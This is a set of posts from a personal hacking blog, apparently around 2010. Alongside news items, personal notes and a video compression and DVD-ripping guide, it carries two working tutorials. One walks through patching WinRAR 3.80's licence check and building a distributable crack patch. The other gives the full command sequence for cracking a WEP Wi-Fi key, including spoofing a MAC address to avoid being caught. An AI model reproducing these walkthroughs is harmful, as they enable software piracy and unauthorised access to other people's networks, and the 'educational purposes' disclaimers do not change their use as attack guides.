An Introduction to Revrerse Engineering - Reversing Winrar step by step

Hi folks,its been a long time since I have posted some thing technical,so I will be writing about the challenge I got at NITLearn to Crack any version of WinRAR – An Introduction to cracking KU, where I reverse engineered WinRAR 3.80 using a disassembler and will tell you the same here. Furthermore, major software are analysed using the same way,but just get a bit complex in the methodology. This tutorial is intended for those who are new to reverse engineering and disassembling.

Disclaimer – By Reading this tutorial You agree that this tutorial is intended for educational purposes only and the author can not be held liable for any kind of damages done whatsoever to your machine, or damages caused by some other,creative application of this tutorial.
In any case you disagree with the above statement,stop here.
The Tools
To perform this hack you will be needing -
  1. Any De-assembler (I use Hackers Disassembler and Hview )
  2. Resource Hacker
  3. A patch Creator ( Use Universal Patch Creator or Code fusion)
You will be able to get them by googling ..

How to Reverse Engineer?
You need to have a bit knowledge of assembly language,and in case you don't have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .
Install WinRAR - www.theprohack.com
Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address
Now load Hackers Disasembler and load the copy in it.

Open Hackers Disassembler and load copy of Winrar in it - www.theprohack.com

The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter..

Reach this block of code using search function - www.theprohack.com

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn't checks for the condition.

We need to edit this code,but first note memory address - www.theprohack.comWe need to edit this code,but first note memory address - www.theprohack.com
In the above code you can see this code -
00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12
This is the code responsible for validating you as a legal user :) . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71 .
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.
Hit the D in toolbar - www.theprohack.com

Now in the dialog box that opens,search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”
Search in dialog references - www.theprohack.com

Double click on it and you will reach the subsequent code.

Note down the location of REMINDER dialog code - www.theprohack.com
The code will be something like
* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB
Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.
Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.


Step 2 – Fixing and Patching
Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.

Open HVIEW and open the EXE in it - www.theprohack.com

After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and yoiu will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.

Decode the code by pressing F4- www.theprohack.com

After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -
Type .444B71 in place of 00444B71
search using F5 - www.theprohack.com

and search in the code.

reach the code - www.theprohack.com

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes -

Change the values- www.theprohack.com

After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -

Offset patching - www.theprohack.com

Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats..You have cracked WinRAR :) Replace the original WinRAR.exe with this copyofwinrar.exe by renaming it. It will work 100% fine :P

Step 3 – Spicing up the EXE
Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.

We need to change registration info - www.theprohack.com

Launch Resource Hacker, load the copyofwinrar.exe in it

Use resource hacker and open the file - www.theprohack.com

Now go to DIALOG –> Expand tree –> ABOUTRARDLG and click it. Now Find Trial copy line and replace it with your favorite one :P

make changes and compile them - www.theprohack.com

and click on Compile Script button.

yup..thats the final result - www.theprohack.com

Now save the file with any name on your desktop or any location what so ever.

save your exe - www.theprohack.com

Now you have a fully patched WinRAR.exe file :)) . If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch :P )
I will be using diablo2oo2's Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.
Launch Patch Creator and click on add new project. Enter project Information and click on save.

Launch the patcher and setup it - www.theprohack.com

Click on Add – ; Offset patch


Create Offset patch - www.theprohack.com

After you have done that, double click on offset patch and then
  1. Give path of original winrar.exe
  2. Give path of unmodified Winrar.exe (again)
  3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
  4. Click on compare and it will show difference between both files
  5. Click on save.
Compare executables - www.theprohack.com
Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL work.

Create your patch - www.theprohack.com

Congrats you have created a patch of your own and have learned to reverse engineer WinRAR :)

Run the patch and it will work :) - www.theprohack.com

You can crack other software in the same way…just practice,debug and disassemble and you will get the way :)
[PS: The above is the long way to do it, I will be telling you the shortest way to crack WinRAR in just 1 step, the main aim of this tutorial was to introduce you to disassemblers and tools, and do some dirty work with your hand. ]
Cheers
XERO





Winners at NIT KU

Hi Folks,as I already told you that I was taking part in Loophole Event at NIT KU at their technical fest Literati 2010, I NIT Kurukshetra was awarded the first prize at the event. Actually,Loophole was a 16 hours workshop on computer security conducted by Kyrion technologies and NIT KU and in between they held a software cracking event. The challenge was to make Winrar 3.80 a full version from an evaluation version (which I will be covering soon asap at my blog ). I was able to crack it and was announced as the winner of the event :) ( I will be throwing a big party at my room ). However I will be taking part in Cyberbytes event,the crossword puzzle and the web trivia event too. You guys can catch me there on 29 Jan 2010 for attending my presentation on Computer Security.
In the mean time you can enjoy some pics at NIT :P
NIT KU - The Institute of National Importance
NIT KU – Institute of National Importance
Me at their Civil Engineering Lab
Me at their Civil Engineering Lab
The Workshop
The Workshop at Jubilee Hall
One of Hacks in progress
One of Hacks in progress
Waking (and waiting) up late at night :P
Waking (and waiting) up late at night :P
The Fountains at the bridge of knowledge
The Fountains at the Bridge of Knowledge

See you folks soon…

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Heading towards NIT-KU

Heading towards NIT-KU

Hi Folks..wanna meet me ? I will be heading towards Literati 2010 at NIT KU on 23 – 24 Jan and will be presenting my whitepaper on computer security on 29 Jan 2010. See you guys there :) Cuz of this event I have been quite busy with the preparations,but I bet it will pay off.

Cheers .

 

- Rishabh Dangwal

 

PS : Support me by donating to Prohack or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Compress Videos to smallest size

Compress Videos to smallest size
Okay..A video is nothing but a series of still images moving in fast motion such that they appear to be moving.I mean a sequence of still images representing scenes in motion.Frame rate, the number of still pictures per unit of time of video,ranges from PAL (Europe, Asia, Australia, etc.) and SECAM (France, Russia, parts of Africa etc.) standards specify 25 frame/s, while NTSC (USA, Canada, Japan, etc.) specifies 29.97 frame/s.The minimum frame rate to achieve the illusion of a moving image is about 15 frames per second or the video will be too jerky and you will be a dead jerk.
TERMINOLOGY 

  • BITRATE/Datarate- The parameter of quality of Video,Higher Bitrate,greater size and gr8 quality.Reverse is ALSO true !
  • FPS - Nopes..its not FIRST PERSON SHOOTER (Sorry gamers :P) Its Frames per second.Simply changing from 30 fps to 24 fps could result in as much as 20 percent file size reduction!It's better to choose a slightly lower, 'round-number' frame-rate in most cases, such as 24.0, or 25.0.
  • CBR - Constant Bitrate.Variable Bitrate in compression leads to high quality audio/video with less file size.
  • VBR - Variable Bitrate.Variable Bitrate in audio compression leads to less high quality audio as compared to VBR.Its Used for streaming purposes.
  • MP1/2/4 or MPEG1/MPEG2/MPEG4 - A video format developed by Motion Pictures Experts Group and Hence the name.MPEG 1 was the first in series allowing for video playback.MPEG2 allows DVD quality and MPEG4 aims at steaming internet media and High compression technique.
  • AVI - Audio Video Interleaved.One of the oldest formats available,It enjoys itself in new incarnations as DIVX and XVID.Its a shell in which other techniques/compression/encoding methods -are worked out.
  • High Definition- Very high bitrate media used for home/personal viewing.

FORMATS


Due to popularization of video,flurry of video formats have flodded the market.But still the most popular ones remain WMV,AVI,MPEG1/2/4,DIVX,XVID,H.264,FLV,RMV,QUICKTIME and More...
Audio formats include MPEG3,Ogg,AC3,WMA,WAV,RM and many more..
Then comes the DVD and High Defination Media,Encoded at much high bitrate

TOOLS

The List is long..and You might not want everyone of them :) To get them,just Google the name.They are widely recognized .
WARNING
=======

[VIDEO ENCODERS/DECODERS ARE SYSTEM/MEMORY HOGS !!! SINCE ITS A VERY INTENSIVE AND TIME CONSUMING PROCESS,YOU MIGHT WANT TO FINISH IT ASAP]
  • NERO - Available like booze and (almost) free. Make it enterprise (if u have not one already) and use NERO VISION to squeeze it out.Also supports editing.
  • Avid - Professionals Use it...nice interface..but still costly.supports editing.
  • IMTOO MPEG ENCODER - Terrific performance,supports exhaustive list of formats.Noobs and Newbie's,do yourself a favor and just stick to it.It will deliver almost everything you want (except editing).
  • FFDSHOW - A collection of collective codecs.Use command line (if you like) to encode videos,or just watch/decode videos using it. It comes free with K-Lite mega codec pack :)
  • VIRTUAl Dub - Free,fantastic and supports everything.But you might need to brainstorm for using it.supports editing and a lot of stuff !! Highly recommended for Geeks .
  • AC3DEC - Used to decode AC3 audio files.Most of DVD's use this audio compression method.Get its GUI program to get the best out of it.
  • FLASKMPEG - used to rip dvd's..well you have plenty of choices out there...

COMPRESSION

"SPEED VS QUALITY"
Compress using any format you want,full frames of even a 10 minute footage will eat up a lot of disk space in your PC.So..some of optimisation measures you can take to compress videos -
  • Choose a good codec like DIVX/XVID,MPEG4 or WMV.
  • When Aiming for MAXIMUM compression with MINIMUM quality loss,So just choosing the compressor is NOT ENOUGH..tweak accordingly bitrates (lower for low quality small file size and higher for more quality LARGE file size)
  • If a larger video is shrunk to 320x240 or similar size, the quality will be MUCH HIGHER than by simply capturing the same video at 320x240.Shrinking the frame size from say 640x480 to say 320x240,will often result in about the same picture quality as the original 640x480 video,but the new 320x240 file will probably be much much smaller.
  • Crop the video to get small frame size.
  • Use low bitrate audio to get small size video.
  • USE NO AUDIO for silent tutorials.
  • Frame rate can drastically affect filesize.
My Setting for Internet publishing/Mobile phones (low end net connection) -
  • CODEC - MPEG4
  • VIDEO BITRATE - 128/160 KBPS
  • AUDIO BITRATE (if any) - 32/48/64 KBPS
  • FRAME RATE - 15/24/25/30 FPS (choose your pick :P )
  • VIDEO SIZE - 320 X 240 for internet,176 X 144 for mobile phones
I use SNAG-IT 8 for as my screen capture program

DVD-RIP



FOR COMPRESSING 4 GB VIDEO MOVIE [Assuming you have .VOB files ready]


Section A for NOOBS


TOOL USED- IMTOO MPEG ENCODER
  1. open IMTOO.
  2. Select Movie File.
  3. Select video size from menu.For DVD quality,choose 720 X 480.
  4. Set Birate to 700-900 KBPS.
  5. Set Framerate to 25 FPS.
  6. Set aspect as you wish.
  7. Set Audio Codec to MP3,Audio bitrate to 160 KBPS/192 KBPS
  8.  Set Audio sample rate to 44100 Hz
  9. Hit Encode and leave the PC alone for encoding of file.
Section B for GEEKS OUT THERE :D


TOOL USED - VIRTUAL DUB,AC3DEC,FLASKMPEG
*PLACE ALL .VOB FILES AT SAME FOLDER !
[1]. open FlaskMPEG to convert the VOB video files,select video file,Choose the type of codec (compressor/decompressor) you want to use generally that will be DivX.DIVX LOW MOTION is best for almost all movies and for those which have NO ACTION and Fast-Motion is only good when almost the entire movie is very fast paced like Terminator 2 or that of Final Fantasy - Advent Children..you get the idea.. and set bitrate to 900 KBPS,frame rate to 24/25 KBPS,choose output location,set process priority to high and hit encode and STAY AWAY FROM YOUR PC !!! After a looooooong time,you will have a single AVI file.
[2]. Put AC3DEC.exe in UR VOB FILE folder,run command prompt, and type-
ac3dec [FILENAME1.VOB] -allvobs -out [filename2.WAV]
NOTE -
* ac3dec is the name of the application being run -- you can also write "ac3dec.exe", with the identical effect
* FILENAME1 is the name of the first .vob file -- in this case 'vts_01_1'
* FILENAME2 is the name of the .wav file you are going to create -- you chose 'MI3Sound'
* -allvobs means to include all .vob files in the folder sequentially (as a single logical file)
* -out means you want to specify the name and path of the output file
Using the example above you will type this in prompt:
C:\MI3> ac3dec vts_01_1.vob -allvobs -out c:\windows\desktop\MI3.wav
Press Enter and the saving process will begin. After it finishes,close command prompt.You will have a file named MI3.wav on your desktop (approx 1GB).

[PS: GUI VERSION OWNERS WILL HAVE LESS HASSLES..BUT AFTER ALL THIS SECTION IS FOR GEEKS :P]
[3]. open Virtual Dub and select Movie File.Choose "Direct Stream Copy" from VIDEO menu.
[4]. Open the audio WAV file which was created by going to the AUDIO menu, and choosing "Use WAV file". Select the .wav file. Choose "Full Processing Mode" under Audio menu.
[5]. Then Choose "Compressor", choose the MP3 codec,Set Audio quality to 160 KBPS for high quality and 192 KBPS for Very High quality audio.
[6]. Then set 24.000 or 25.000 FPS from Frame rate option in video menu.
[7]. Choose "FILTERS" in the VIDEO menu and Add filters you want one at a time (if you wish).Configure it and use it accordingly.
[8]. Hit encode and in 25 to 50 minutes you will have your rip ready :)

NOTE : You can test how good the compression is so far, by compressing the resulting video file into a RAR file.Two Cases arise then -
  1. If there is less than 5% compression,the compression is probably about as good as it will get.
  2. If there is more than 5% compression,the audio and/or video can probably be compressed even further.h.264 or xvid/DIVX are your best bets for smallest file size at any given quality. Just keep in mind that eah has various quality settings that effect the compression, and thus the output size. You could use the same program to convert to each, but if the default settings are different,your output file size testing would be skewed.

FINDING SOFTWARE

DVD-Ripping software of all kinds can be gotten at www.divx-digest.com
www.download.com for all different kinds of programs

PS : Like this article ? You can always support me by buying me a coffee or You can always try some 
of the cool merchandize from PROHACK. POSTED BY XERO ALL RIGHTS RESERVED.

Google Attacked – May Leave China

Google may leave China
A highly targeted attack on Google China and 20 other high profile companies including Adobe Systems has led to a major controversy. The attack that hit Google in mid December originated in China and was targeted to get email credentials of human right activists who are advocates of human rights in China based in Europe,America and China.The attack was discovered as Google uncovered similar attacks on at least 20 other companies in the financial, technology, media, and chemical industries. Adobe Systems issued a separate statement that reported it and other companies had also come under attack. In light of the revelations, Google said it is considering shuttering its Chinese operations altogether.
"These attacks and the surveillance they have uncovered - combined with the attempts over the past year to further limit free speech on the web - have led us to conclude that we should review the feasibility of our business operations in China," Google's chief legal officer David Drummond commented here. "We have decided we are no longer willing to continue censoring our results on Google.cn, and so over the next few weeks we will be discussing with the Chinese government the basis on which we could operate an unfiltered search engine within the law, if at all."Internet in china is quite controlled
The attack resulted into a breach of 2 email accounts,and the company has quoted that no major information except date of account creation and the subject line was compromised rather than the content of email itself.Also the names of 20 companies have also been omitted. Recent attacks on Adobe pdf readers and applications to bind malware code with them has been on rise and the timing of Google’s warning and the official statement of Adobe has led to a speculation that some of attacks may have used the Adobe applications or exploits. Google also mentioned in a separate blog post that servers of companies have not been targeted.
China has been known for its quite controlled internet policies and Chinese hackers have recently gained notoriety along with Russian ones in the scene. With the rising attacks on major companies,lets see what steps silicon giants take to counter it.

update - Google has rolled out the option to use default HTTP access in Gmail due to the attack on Gmail accounts in China. One more step towards security..You can read more about it here

Via The register


PS : Like this article? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Finally I got my PC back

Its been quite long since I was doing my daily rituals of checking emails to reading technology blogs on my roommate’s laptop – a Compaq Presario V3000 . As soon as my exams were over,I hunted markets for an ideal cheap and best combo for a motherboard and processor,as my old mobo-processor died in November. Finally one dedicated blog reader Arun Mishra suggested me G41 with Intel Dual core E5300 for my paltry budget of 6000/- INR and it hit the spot with me buying Asrock G41M-VS2 and Intel E5300 2.6 Ghz and feeding it with 2 GB ddr2 ram. Now my rig is alive and kicking and I had one


Intel E5300Asrock G41M-VS2
full day devoted to playing MGS2:Sons of Liberty and RE4 on it.The Board supports Pixel Shader 4.0 and will run most of modern gen games,although it WILL suffer from ultra low frame rates but that's okay with me as it allows me a bit of future proofing as I live in India where dual core is still the way to go according to computer vendors here (core 2 duo,quad are a distant possibility in next 2 years in lower budget segments..seriously). Furthermore I just need to try my tools,exploits and blog from this pc so high performance is not a major factor here.
In all..I m back (i m feeling like a cliche’) on my technoblogging. Also,I will be attending Literati 2010 at NIT-KU and you guys can meet me there :)
Stay gold
XERO

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.

Google Nexus One Launch – Google Jumps Mobile

Google will be announcing its own smartphone and will finally jump into the mobile computing officially. The smartphone Google Nexus one Launch - rdhacker.blogspot.com named Nexus One will showcase the latest generation of the Linux-based open source Android operating system and will be directly marketed by Google itself. Designed by HTC it runs Android OS 2.1 which is a step up from older version 2.0.
The Nexus One is powered by a 1-GHz Snapdragon CPU, a 3.7-inch 480 x 800 display,5 Megapixel camera with LED flash, 512 MB of of RAM and an expandable 4-GB microSD card, The 1-GHz processor alone should make the Nexus one of the fastest smartphones available currently and it will have a stiff competition from the product offerings by Apple iPhone,Nokia,Palm and Blackberry.
Google Nexus One - rdhacker.blogspot.com
The Phone will be priced at about
  • 530$ Unlocked and
  • 180$ subsidized with a contract to commit for 2 years.
With Google jumping up in the mobile market,the biggest loser is Microsoft as HTC used to be its flagship company for its Windows mobile phones, and now its not. Overall,Nexus has less to suggest as a standard and set itself as a benchmark in the market due to the competitive offerings from other smartphone makers,unless Google baffles us with some nice welcoming tricks under its sleeves.

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

POSTED BY XERO ALL RIGHTS RESERVED.Google Blog.


Spanish Prime Ministers Website Defaced

Visitors of the country’s official website were greeted by the slapstick character Mr Bean as the official website was XSS allows attacker to inject malicious code into websites - rdhacker.blgospot.com defaced by malicious hackers.The representative for Spanish Prime Minister Jose Luis Rodriguez Zapatero confirmed the defacement of www.eu2010.es but insisted that the website was never compromised and was left untouched,therefore the act was more or less was a stunt.

The act was done using a Cross-site Scripting attack which injects custom unauthorized content into vulnerable websites.People who tried to visit the PM's site site were briefly met by an image of Mr. Bean actor Rowan Atkinson. Comparisons between the appearance of Spain's leader and the buffoon have been a long-standing joke.

Spanish Prime Ministers Website Defaced - rdhacker.blogspot.com

While the hack was relatively harmless XSS, or cross-site scripting holes can be exploited to inject malicious code into visitors' browsers that steal authentication credentials or redirect victims to malicious websites.Recently the frequency of XSS attacks have quite increased and may pose a potential threat to major websites of the world.

 

PS : Like this article ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

 

POSTED BY XERO ALL RIGHTS RESERVED.

 

Hack Wifi using Backtrack

Hacking Wifi using Backtrack - rdhacker.blogspot.com

Wifi or Wireless Fidelity is the name of a popular wireless networking technology that uses radio waves to provide wireless high-speed Internet and network connections (as if you didnt know..),Wifi has become an integral part of our lives today. Wifi is secured using a WPA protocol which intends to secure Wireless LANs like Wired LAN’s by encrypting data over radio waves,however, it has been found that WEP is not as secure as once believed.Now almost anyone can hack into a Wifi network by generating the valid WEP key using Bactrack. Read on to learn how ..

Disclaimer: This tutorial is given for educational purposes only and that for any misuse of this information, the blogger cannot be held liable.

SETTING UP THE CARD AND THE CONSOLE

Boot up Backtrack on your virtual machine/laptop and open up the command console and type the commands as they are given -

  • ifconfig

This is the Linux equivalent of ipconfig, you will see the network adaptors in your system. See which one is for Wi-Fi. A few examples are wlan0, wifi0, etc.

  • airmon-ng

This command will initialize the Wi-Fi network monitoring & will tell you how many networks are in range

  • airmon-ng stop [Wi-Fi Card name(without the quotes)]

This command will stop the cards broadcast and reception immediately

  • macchanger –mac [Desired MAC address] [Wi-Fi card name]

this command will change the current MAC address to any MAC address you desire, so that you don’t get caught later

  • airmon-ng start [Wi-Fi Card name]

You will see another extra adaptor that is set on monitor mode, use that adaptor for all further purposes in the following commands where – ‘[Wi-Fi card name]’ appears

DUMPING PACKETS

Once you have set up all the parameters,you need to sniff and dump data packets in order to get the key.You can do so by using following commands. On the command console type these commands -

  • airodump-ng [Wi-Fi card name]

Copy and paste the BSSID in the following command and execute it

  • airodump-ng –c [Channel Number] –w [Desired Filename for later decryption] --bssid [BSSID] [Wi-Fi Card name]

As you execute the command, you will see a certain number of beacons and data packets that will be stored in the filename you have given. The file will be stored in the root of the system drive (Click on Computer and you will see the file).The file will be present in two formats: *.cap, *.txt.

SPEEDING UP THINGS

However packet dumping is quite a slow process,we need to speed up things to save our time.Open a new console after the first data packet has been stored and type the command in the new console and execute it

airreplay-ng -1 0 –a [BSSID] –h [FAKED MAC ADDRESS] -e [Wi-Fi name (you wish to hack)] [Wi-Fi card name]

As you type this command you will see that the data packets required for breaking the key will increase dramatically thereby saving you a lot of time.

REVEALING WEP KEY

Open another console once you have around 20,000 data packets and type the following command to reveal the WEP key.

aircrack-ng –n 64 –b [BSSID] [Filename without the extension]   Revealing the WEP Key - rdhacker.blogspot.com

As you type this command, you will see that a key will appear in front of you in the given below format:

XX:XX:XX:XX

It is not necessary that the key should have exactly the same digits as shown above so please don’t freak out if you see a 10 digit or 14 digit key. Also if the decryption fails, you can change the bit level of the decryption in the command:

aircrack-ng –n [BIT LEVEL] –b [BSSID] [Filename without extension]

Remember, the bit level should be a number of 2n where n:1,2,3,4…

e.g.

aircrack-ng –n 32 –b [BSSID] [Filename without the extension]

OR

aircrack-ng –n 128 –b [BSSID] [Filename without the extension] etc. etc.

Now just login using the WEP key you got.

 

Cheers

PS : Like this tutorial ? You can always support me by buying me a coffee or You can always try some of the cool merchandize from PROHACK.

 

POSTED BY XERO ALL RIGHTS RESERVED.ANONYMOUS AUTHOR.